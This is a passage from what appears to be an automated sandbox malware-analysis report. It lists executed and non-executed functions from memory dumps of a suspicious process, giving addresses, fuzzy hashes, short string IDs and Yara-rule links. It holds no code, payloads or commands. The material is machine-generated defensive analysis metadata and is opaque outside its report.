                          • Instruction ID: fcc5e8ebf9331f232d2fdda3a14ec23f93aadfcb21142ad70328a9fbcd368054
                          • Opcode Fuzzy Hash: 3e6e2740055e9dab32d88b9a393ece078791289f2ae14ec14bcf6ade3865bb00
                          • Instruction Fuzzy Hash: 21F0A430A0E79E8FDB91AF6488692F93BB0EF15211F0505BBD818C71B2DB385640CB00
                          Function 00007FFD9B78C379 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00991be579c2b81fbdb5dc238589731e9f685e5105e630a02674734e1533dbc9
                          • Instruction ID: 0cb66b380cfbfbef81068c4fc33257d2d1e4e34c54cfe8231034c6d2fda4106f
                          • Opcode Fuzzy Hash: 00991be579c2b81fbdb5dc238589731e9f685e5105e630a02674734e1533dbc9
                          • Instruction Fuzzy Hash: 6601813090EB8E8FDB55DF6488691A93FB0EF16305F5601BBE808C64B2CB399655C782
                          Function 00007FFD9B7921C1 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 58a3e8e9b0106cad7d1fa0e305b5fcd13a155e6c75a48ceaca73b727ac0db8a3
                          • Instruction ID: eb250db3cdd664c9295bc990fd55f2c7f0f1c4ef05cccb6f4df4d24179dc260b
                          • Opcode Fuzzy Hash: 58a3e8e9b0106cad7d1fa0e305b5fcd13a155e6c75a48ceaca73b727ac0db8a3
                          • Instruction Fuzzy Hash: 48F08931E5A24E4BEB599EA0D8655F93760BF05314F421576E419C20A2DA386614C741
                          Function 00007FFD9B78EF0C Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 59104719dba1c97807e5be2534873fccc46308f076d19359fff60369de220f21
                          • Instruction ID: 25dc6b73a266a537a9281a4450f02631d1d5fd046dd2830a3ed5f53d585ecb98
                          • Opcode Fuzzy Hash: 59104719dba1c97807e5be2534873fccc46308f076d19359fff60369de220f21
                          • Instruction Fuzzy Hash: AC010870A09A1D8BDB78DF44C8A07E8B7B2EF94302F5006AAD10D972A1CB385B84CF05
                          Function 00007FFD9B782739 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1d99eeb024cae3ab7922b7ad2399ca9ca3cc7d885652d6fcef6e927a5a24340
                          • Instruction ID: a373bc63199d5f86a0844828725a12c519e2df18f5266b4006cc1304e6dcf4e1
                          • Opcode Fuzzy Hash: b1d99eeb024cae3ab7922b7ad2399ca9ca3cc7d885652d6fcef6e927a5a24340
                          • Instruction Fuzzy Hash: 8EF0C23191E7CD8FDB6AAB6088752A97BA0BF16302F4605BAD509C60F2DA389504C741
                          Function 00007FFD9B78B044 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: caaf8cd346507a8ff680ea615d5318327271c694c72a982ac56cbd638582fcb9
                          • Instruction ID: 7e171fb2005ac02d887e5c2d45b9908c6d05a18237a10db0f7124868cb46b441
                          • Opcode Fuzzy Hash: caaf8cd346507a8ff680ea615d5318327271c694c72a982ac56cbd638582fcb9
                          • Instruction Fuzzy Hash: 72F03C70E19A1D8FDBA0EB58C495BA9B3B1EB58301F1182EA940DE6165DE305AC58F40
                          Function 00007FFD9B7827AD Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4b50cd841b72ee69f5d53e5abf8a1adb2444f6864b5baa682e58fd3f457e944
                          • Instruction ID: 44afe219ff2ef72133df020321ba68ce339fb8414c959787b67a300e4df1faa5
                          • Opcode Fuzzy Hash: f4b50cd841b72ee69f5d53e5abf8a1adb2444f6864b5baa682e58fd3f457e944
                          • Instruction Fuzzy Hash: D6F0B43090E78E8FDB599FA088652A93BA0EF06202F0545BED80CC71F2DB38A504C701
                          Function 00007FFD9B78BD0B Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction ID: 2c33ef3e475f93cf595fb6b63f8bb2ed8ffa38757c5306a9e2b559fa6980a0c6
                          • Opcode Fuzzy Hash: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction Fuzzy Hash: CFD0E235E0892DCFCF50EBC8D8502ECB3B0FB58301B400122D00DD3261DB3068108B00
                          Function 00007FFD9B785963 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15f3ff66a22f9e42de22b427790b1cf0469de503211d77b0e94b4ca2800d7886
                          • Instruction ID: a5f3e9d603323a9842c3f5202c6358e6d2a566ea5301199fd73b34d88461f91f
                          • Opcode Fuzzy Hash: 15f3ff66a22f9e42de22b427790b1cf0469de503211d77b0e94b4ca2800d7886
                          • Instruction Fuzzy Hash: C7E0C970E45A2D8FDBB4DB04CC94BE9B7B1AB58302F1011E9800DE32A0DA305FC18F80

                          Non-executed Functions

                          Function 00007FFD9B78F6B8 Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$9$F$N$[$g
                          • API String ID: 0-3581475096
                          • Opcode ID: c93fab4491663c4cd7aa8ad77d6a865f74adb0e366b5eca7ca7d4b75c5de523b
                          • Instruction ID: 09b7ead1b69804412b14e09fe9eed7e1dc3af90218450b8e2da2830dd6bd69f1
                          • Opcode Fuzzy Hash: c93fab4491663c4cd7aa8ad77d6a865f74adb0e366b5eca7ca7d4b75c5de523b
                          • Instruction Fuzzy Hash: 3441B470E09A2E8FEB74DF54C8A47ACB6B1AF55305F1105EAD51DA62A1CB785F80CF01
                          Function 00007FFD9B78E4B5 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: 5$F$\$a
                          • API String ID: 0-2903695511
                          • Opcode ID: 9b45f0a3a280125206068fb9cadfc2d340c3d597d5d03340c320b23efa04e23e
                          • Instruction ID: be0a4949f239418bfede44fe426698913ed07e273e68ff6ae16b36920a952ad3
                          • Opcode Fuzzy Hash: 9b45f0a3a280125206068fb9cadfc2d340c3d597d5d03340c320b23efa04e23e
                          • Instruction Fuzzy Hash: 66419370E09A2D8FEB69DF54C8A57E9B6B1AF59301F1105EAD01DA62A1CB785F80CF40
                          Function 00007FFD9B78F20F Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,$0$7${
                          • API String ID: 0-2418471262
                          • Opcode ID: 5692aaeb3bf79c102aef1fd30b7e213af22d838ef924334715e8a24c78043dec
                          • Instruction ID: 14444baa57fa8cb67fc885b214745575ff89188b8963be0bd2c4c1f726a97aca
                          • Opcode Fuzzy Hash: 5692aaeb3bf79c102aef1fd30b7e213af22d838ef924334715e8a24c78043dec
                          • Instruction Fuzzy Hash: 9541E770A09B2E8FEB78DF54C8A47ADB7B1AF55301F1149A9D40D9A2A1CB385B80CF41
                          Function 00007FFD9B78E939 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: 5$Q$V$u
                          • API String ID: 0-1755314862
                          • Opcode ID: ed7d68fc7d5c8adff31dce5397f5faa51d0d6e59b20a967e63dd5ff95c08ee3a
                          • Instruction ID: 5c052b13e942686f8ca96638afb65b4260c54ea63a8c36ed76464ccf7412a9cd
                          • Opcode Fuzzy Hash: ed7d68fc7d5c8adff31dce5397f5faa51d0d6e59b20a967e63dd5ff95c08ee3a
                          • Instruction Fuzzy Hash: C841BA70E09A1D8FEB78DF54C8A47E9B7B2AF54301F1146BAD11DA62A1CB785A80CF41
                          Function 00007FFD9B78EF25 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: H$K$[$`
                          • API String ID: 0-2859840478
                          • Opcode ID: fb605bd72fea9ebb1d82fce90675081670e3debfccf7eac51186a2b7ae52a2de
                          • Instruction ID: 15a4f8d1f547d0235ba865a91fb63dbcc70bfd54559b7d577aedbfa19b0f383b
                          • Opcode Fuzzy Hash: fb605bd72fea9ebb1d82fce90675081670e3debfccf7eac51186a2b7ae52a2de
                          • Instruction Fuzzy Hash: AF210670E4962E8AEB74DF50C8A4BF876B1AF54306F1105BAD01D9A2A1CB385A80CF40

                          Executed Functions

                          Function 00007FFD9B763505 Relevance: .3, Instructions: 319COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 966e15945c237636337033962f45dffbacd98826ace0b82f01e751f71a064570
                          • Instruction ID: f586c4f41284ca68a76f6db3f7216325aaecbec8331e3ad6f68fb025c209ea65
                          • Opcode Fuzzy Hash: 966e15945c237636337033962f45dffbacd98826ace0b82f01e751f71a064570
                          • Instruction Fuzzy Hash: 8EB1B271A19A4E8FEB98DFACC8657AD7BE0FF65300F5102BAD00AC32E6DA742441C741
                          Function 00007FFD9B763585 Relevance: .3, Instructions: 253COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b760000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 494dc8e24270f90d04e5e67eaf2f0c53e42ac9f89963afcc3290bbb2207c2660
                          • Instruction ID: 824fa181892ff0051d527e299780c1133a4135b88cb055fe79f6602da0b2852a
                          • Opcode Fuzzy Hash: 494dc8e24270f90d04e5e67eaf2f0c53e42ac9f89963afcc3290bbb2207c2660
                          • Instruction Fuzzy Hash: 0B81B271A1994D8FE794DBAC88257ACBBE1FF66310F5102B9D00AC32E6DAB42841C741
                          Function 00007FFD9B76C66D Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: _$K~N
                          • API String ID: 0-341629335
                          • Opcode ID: 554fa280467b03243b9724c0246e6994060027a4abaa8dc1498f6dbe4efda4e8
                          • Instruction ID: 539375f4028c9353ff1eadd2edb1404f1af37af5d961770f883fae2c4abf01fa
                          • Opcode Fuzzy Hash: 554fa280467b03243b9724c0246e6994060027a4abaa8dc1498f6dbe4efda4e8
                          • Instruction Fuzzy Hash: B871F22BB0D66B9EE7257BBCB8254FD3B40DF90335B0902B7E19DC90E3DE1920468695
                          Function 00007FFD9B76C6FB Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b76a000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: _
                          • API String ID: 0-701932520
                          • Opcode ID: 1d3a84533da0beb59e1f769ab40719c47a6355bd0638745f2d4e48f88e2c063c
                          • Instruction ID: 4e7df733cb3e17d20300e267ed073a054d56fee34aea5e8a45316857219e6b49
                          • Opcode Fuzzy Hash: 1d3a84533da0beb59e1f769ab40719c47a6355bd0638745f2d4e48f88e2c063c
                          • Instruction Fuzzy Hash: 3D41243770961E8EE7297BBCBC151FD7750EF50331B050277E25DCA0A2DA2465498BC1
                          Function 00007FFD9B777495 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: c2fb9c648cff2a35a3f5cecae32737e861754ca5488b530901ab7225941171e6
                          • Instruction ID: bb1ab71093962805623b802b437fa19bb878d540d5cd94daafea9b07f085e20d
                          • Opcode Fuzzy Hash: c2fb9c648cff2a35a3f5cecae32737e861754ca5488b530901ab7225941171e6
                          • Instruction Fuzzy Hash: E831D331A0A34E9FEB61DBA4C8A4AE93BE0EF05314F154276C409D71B6EA78A504C701
                          Function 00007FFD9B776B21 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 3f5498bd73672820202be159f50f78154d7415a46d9436fc30c67216837fc335
                          • Instruction ID: 592a7510c70ba9b0cf66e088c49664f8d4eaecdb56d539ee834363dbd490bfac
                          • Opcode Fuzzy Hash: 3f5498bd73672820202be159f50f78154d7415a46d9436fc30c67216837fc335
                          • Instruction Fuzzy Hash: 4711DF30A09A4E8FDB58EFA884696B93BB0FF29301F1001BED419C31B6DA34A140CB40
                          Function 00007FFD9B7738FA Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 13e1460494042e6e9cd624ea3485242949848747afa9edcd53aa2eaca1bfa000
                          • Instruction ID: 6f00d2a8dc54a4a0763314c71770318200bf18546e6f3313e8f40467f2eeb5c3
                          • Opcode Fuzzy Hash: 13e1460494042e6e9cd624ea3485242949848747afa9edcd53aa2eaca1bfa000
                          • Instruction Fuzzy Hash: 4121A431A0E68A4EE751EBA888A86F97BE0FF15314F0605B6D458C70B3DA64A744CB61
                          Function 00007FFD9B772518 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 244d76d71a8d56458f5616b2aef3765676d48f319d3019dfbc0ada57afc1c8d6
                          • Instruction ID: 1573d5ce5a1c1633b0b9f4589d60d4e7dad91d283aa58e5fbe95d07d512d31fa
                          • Opcode Fuzzy Hash: 244d76d71a8d56458f5616b2aef3765676d48f319d3019dfbc0ada57afc1c8d6
                          • Instruction Fuzzy Hash: 9021472090E78A4FD7569BB088786A47FA0EF17304F1A45EFD45ACB0B3DA695905C712
                          Function 00007FFD9B774585 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 35053184200562bd7b5971c8db96a779a49ba4e418deeecb978ede462003d5f7
                          • Instruction ID: fc319cc7f35fcc4329f26aa899905690796e2498387b503510e6b24a07a4c1ad
                          • Opcode Fuzzy Hash: 35053184200562bd7b5971c8db96a779a49ba4e418deeecb978ede462003d5f7
                          • Instruction Fuzzy Hash: E511AF30A09A4E8FDB58EF68C4696BD3BA0FF28301F0102BED419C71A6DA746550C741
                          Function 00007FFD9B774A25 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 1787ae15f18f43e3316592cdb7782219435aa016bc47acebd8c3d4eb0af7d440
                          • Instruction ID: 9c4b5428f5abf74d42532ca8c33134f0bf145cddf911ad156412214c4c056f91
                          • Opcode Fuzzy Hash: 1787ae15f18f43e3316592cdb7782219435aa016bc47acebd8c3d4eb0af7d440
                          • Instruction Fuzzy Hash: 6F11E371A0EA8E4BEB69DFA488B56BC7BA0FF15304F0601BED01DC75F2DA696514C601
                          Function 00007FFD9B7711FE Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: aceb76cc8bcd1d3f42a8b7365dd9951e719bc98f5d54c00ad53bc737598e8ebe
                          • Instruction ID: 439cd99abc76e80997ec54ea2185b70f737fb4f42c7c0b306e26120d36f7465d
                          • Opcode Fuzzy Hash: aceb76cc8bcd1d3f42a8b7365dd9951e719bc98f5d54c00ad53bc737598e8ebe
                          • Instruction Fuzzy Hash: 5121E735E0931D8FDB68CF94D8E0AEDB7B1EF45311F1101AAD50AA76A0CA746A84CF40
                          Function 00007FFD9B774B4D Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 4f15d869ead070a127f593be2830c47a495cc104d8b0074a7d6fd003c618fb4d
                          • Instruction ID: 43fbcacd932fb9342d23fa29bd916ee06c6462075e800e7f06b23561682a5bb2
                          • Opcode Fuzzy Hash: 4f15d869ead070a127f593be2830c47a495cc104d8b0074a7d6fd003c618fb4d
                          • Instruction Fuzzy Hash: C6116A70A0964E8BEB58EB6488A96BE77F0FF29305F0106BED419C35A6DA786544CB01
                          Function 00007FFD9B775E39 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 884c483a38b96e88906246a533d1838abc19c31671991af7e6d028aaca0740bb
                          • Instruction ID: 2c5bb6a296ec50116a84c19fdc4bf4ebea5281914c48a3df2c754c141cf3ae66
                          • Opcode Fuzzy Hash: 884c483a38b96e88906246a533d1838abc19c31671991af7e6d028aaca0740bb
                          • Instruction Fuzzy Hash: 92119131A0D68E8EE751AB7488686B97BF0FF15300F4506B6D418CB0B6EA78A5448701
                          Function 00007FFD9B774D0D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 58cf9e784fcd45eb27e141bf0204af8893a130e7ea6fa57bb119a04636789e61
                          • Instruction ID: 1cbeba5d4ec732d87c951bbb70406175c74de19bdd55ebe61adf5bbdf8f9eacf
                          • Opcode Fuzzy Hash: 58cf9e784fcd45eb27e141bf0204af8893a130e7ea6fa57bb119a04636789e61
                          • Instruction Fuzzy Hash: 1411BC30A09A4E8FEB59EB648869ABD77E0FF28304F0105BED42DC71E2DE74A100CB00
                          Function 00007FFD9B774F35 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 3c69ca0bc7938f2340cfab5c41ab8059b6efbc093ed04c1e34087884a1a8cec9
                          • Instruction ID: 507659eacb1afc0e097fe742865c5e3902856fc4bb30ccfbe8eed9fa727be0bf
                          • Opcode Fuzzy Hash: 3c69ca0bc7938f2340cfab5c41ab8059b6efbc093ed04c1e34087884a1a8cec9
                          • Instruction Fuzzy Hash: 9E019230A1968E8FE751EBA488A86ED77E0FF19301F4645BAD418C70B6EA38A6448641
                          Function 00007FFD9B777429 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: a420dc75d615fa83c542ded62bd37a9451ab2ec39d3fd4b2f6402578990423e8
                          • Instruction ID: 3c3cda8c22c1d930d35979c426bb7478add1c16a1376092f820bdda9977291c5
                          • Opcode Fuzzy Hash: a420dc75d615fa83c542ded62bd37a9451ab2ec39d3fd4b2f6402578990423e8
                          • Instruction Fuzzy Hash: 6F01F731A1E74E5FE711E77488686A93FF0EF05304F5645F3C408CB0B6EA38A5448710
                          Function 00007FFD9B771168 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.1800856845.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_7ffd9b771000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: edf81a810613a2e037d4d63c5d2abbb53489cdc0e7cb8f811dcb249fd8c5c77d
                          • Instruction ID: 9c15d6f7de77eb72a35b08f701510679f549b0db731732854c98a9c174097ed4
                          • Opcode Fuzzy Hash: edf81a810613a2e037d4d63c5d2abbb53489cdc0e7cb8f811dcb249fd8c5c77d
                          • Instruction Fuzzy Hash: 30F0EC35A0871D8FDF28DE90C8A0AEE77B5EB55311F04026AD51A9B2A0DA746A44CB41
                          Function 00007FFD9B77316D Relevance: .5, Instructions: 453COMMON
                          Download Yara Rule
                          Memory Dump Source
